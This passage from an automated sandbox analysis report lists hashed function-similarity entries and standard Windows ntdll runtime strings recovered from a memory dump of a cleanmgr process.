                                                                                                        • Execute=1, xrefs: 04FD4713
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2579148300.0000000004F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F30000, based on PE: true
                                                                                                        • Associated: 0000000F.00000002.2579148300.0000000005059000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.2579148300.000000000505D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.2579148300.00000000050CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_4f30000_cleanmgr.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                        • API String ID: 0-484625025
                                                                                                        • Opcode ID: 86e2651ff213aae10f706ef581641c405ba8973f912d830a9488690a9202dcc8
                                                                                                        • Instruction ID: 3b0623cd0e8ef2bf0d6d6184ecbe3949c469644ab0490273ef1ed2a3bdbec369
                                                                                                        • Opcode Fuzzy Hash: 86e2651ff213aae10f706ef581641c405ba8973f912d830a9488690a9202dcc8
                                                                                                        • Instruction Fuzzy Hash: F451E871A10319FAFF10BE64DC49BAE77E8EB44304F040099E605A7191EB71BE478E51
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2579148300.0000000004F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F30000, based on PE: true
                                                                                                        • Associated: 0000000F.00000002.2579148300.0000000005059000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.2579148300.000000000505D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.2579148300.00000000050CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_4f30000_cleanmgr.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: __aulldvrm
                                                                                                        • String ID: +$-$0$0
                                                                                                        • API String ID: 1302938615-699404926
                                                                                                        • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                                                        • Instruction ID: 525aa912d87e6b6e90c8d638751ddabbb8796061d7afb8717a7a79c8497a2eff
                                                                                                        • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                                                        • Instruction Fuzzy Hash: 1881E1B0E052498EEF28CF68C8907FEBBB1AF45310F184259DA61A7391D770B863CB51
                                                                                                        Strings
                                                                                                        • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 04FD02E7
                                                                                                        • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 04FD02BD
                                                                                                        • RTL: Re-Waiting, xrefs: 04FD031E
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2579148300.0000000004F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F30000, based on PE: true
                                                                                                        • Associated: 0000000F.00000002.2579148300.0000000005059000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.2579148300.000000000505D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.2579148300.00000000050CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_4f30000_cleanmgr.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                                        • API String ID: 0-2474120054
                                                                                                        • Opcode ID: eb49e44b3d22cca8cdc45e6d576044b59f504b7d0372a81628615e44579e3727
                                                                                                        • Instruction ID: 28ed2be6d5ddc37802f7678566bba9c6ab8aab906500510d649b61518d702320
                                                                                                        • Opcode Fuzzy Hash: eb49e44b3d22cca8cdc45e6d576044b59f504b7d0372a81628615e44579e3727
                                                                                                        • Instruction Fuzzy Hash: 33E1B171A047419FE725DF28C844B2AB7E1FB88318F140A5DF5958B2D1EB74F846CB62
                                                                                                        Strings
                                                                                                        • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 04FD7B7F
                                                                                                        • RTL: Re-Waiting, xrefs: 04FD7BAC
                                                                                                        • RTL: Resource at %p, xrefs: 04FD7B8E
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2579148300.0000000004F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F30000, based on PE: true
                                                                                                        • Associated: 0000000F.00000002.2579148300.0000000005059000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.2579148300.000000000505D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.2579148300.00000000050CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_4f30000_cleanmgr.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                        • API String ID: 0-871070163
                                                                                                        • Opcode ID: 8b928ee89cc6fc908f6db4c6ee191290f1cdb7a0c1a0bcf9507bb4e890b4d538
                                                                                                        • Instruction ID: 3e5a382be15871220ee79f2c2108ee23d8ceb91ccb19d1b452e8c8e532a23acc
                                                                                                        • Opcode Fuzzy Hash: 8b928ee89cc6fc908f6db4c6ee191290f1cdb7a0c1a0bcf9507bb4e890b4d538
                                                                                                        • Instruction Fuzzy Hash: 2E41C135B047029FEB20EE25DC40B6AB7E5FF88715F100A1DE95A9B680DB71F9078B91
                                                                                                        APIs
                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 04FD728C
                                                                                                        Strings
                                                                                                        • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 04FD7294
                                                                                                        • RTL: Re-Waiting, xrefs: 04FD72C1
                                                                                                        • RTL: Resource at %p, xrefs: 04FD72A3
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2579148300.0000000004F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F30000, based on PE: true
                                                                                                        • Associated: 0000000F.00000002.2579148300.0000000005059000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.2579148300.000000000505D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.2579148300.00000000050CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_4f30000_cleanmgr.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                        • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                        • API String ID: 885266447-605551621
                                                                                                        • Opcode ID: 859c14f3de336f9e4d4f53eb4819fabdede4b8d96c7b3e48dc3f0294c0bfd110
                                                                                                        • Instruction ID: 296ed0313302324423463fc5bc7f5ace3913b34d5e2e45a99ec0587ba9516c52
                                                                                                        • Opcode Fuzzy Hash: 859c14f3de336f9e4d4f53eb4819fabdede4b8d96c7b3e48dc3f0294c0bfd110
                                                                                                        • Instruction Fuzzy Hash: 1D410332B00242ABEB21EE25CC41B6AB7E6FF84715F140619F955EB280DB21F8139BD1
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2579148300.0000000004F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F30000, based on PE: true
                                                                                                        • Associated: 0000000F.00000002.2579148300.0000000005059000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.2579148300.000000000505D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.2579148300.00000000050CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_4f30000_cleanmgr.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: __aulldvrm
                                                                                                        • String ID: +$-
                                                                                                        • API String ID: 1302938615-2137968064
                                                                                                        • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                                                        • Instruction ID: 110947ccb24e9180d4b4f8c8ce6dda7425892ba07667acdcebfc14190e4dcb5b
                                                                                                        • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                                                        • Instruction Fuzzy Hash: 1C9184F1E002169ADF24EF69C880EBEB7F5AF44760F14451AE855E72C0E770EA628760
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2579148300.0000000004F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F30000, based on PE: true
                                                                                                        • Associated: 0000000F.00000002.2579148300.0000000005059000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.2579148300.000000000505D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.2579148300.00000000050CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_4f30000_cleanmgr.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: $$@
                                                                                                        • API String ID: 0-1194432280
                                                                                                        • Opcode ID: 9ecca837dcdc93175b72e060f6cd135464eed320f314a919cd692ca68f39f157
                                                                                                        • Instruction ID: cd32351745961abb14b3bf2a4e390d2c2afd94714ef1a231edc488fbcb133f67
                                                                                                        • Opcode Fuzzy Hash: 9ecca837dcdc93175b72e060f6cd135464eed320f314a919cd692ca68f39f157
                                                                                                        • Instruction Fuzzy Hash: 75811DB1D002699BDB31DF54CD45BDEB6B8EF48714F0141EAA909B7280E7706E86DF60
                                                                                                        APIs
                                                                                                        • @_EH4_CallFilterFunc@8.LIBCMT ref: 04FECFBD
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2579148300.0000000004F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F30000, based on PE: true
                                                                                                        • Associated: 0000000F.00000002.2579148300.0000000005059000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.2579148300.000000000505D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.2579148300.00000000050CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_4f30000_cleanmgr.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CallFilterFunc@8
                                                                                                        • String ID: @$@4_w@4_w
                                                                                                        • API String ID: 4062629308-713214301
                                                                                                        • Opcode ID: a9b55c00246ab218f3f22bca1bec51e44dd29304df95d36828e0ae4f1484cf26
                                                                                                        • Instruction ID: f199ac42c7af174800a4d978c77f568f4912baedc203ef43a9e5a2abc6772281
                                                                                                        • Opcode Fuzzy Hash: a9b55c00246ab218f3f22bca1bec51e44dd29304df95d36828e0ae4f1484cf26
                                                                                                        • Instruction Fuzzy Hash: 7F41C171D00259DFDB219FA6EC40ABEBBB8FF44B14F04442AEA05DB254D735E802DB61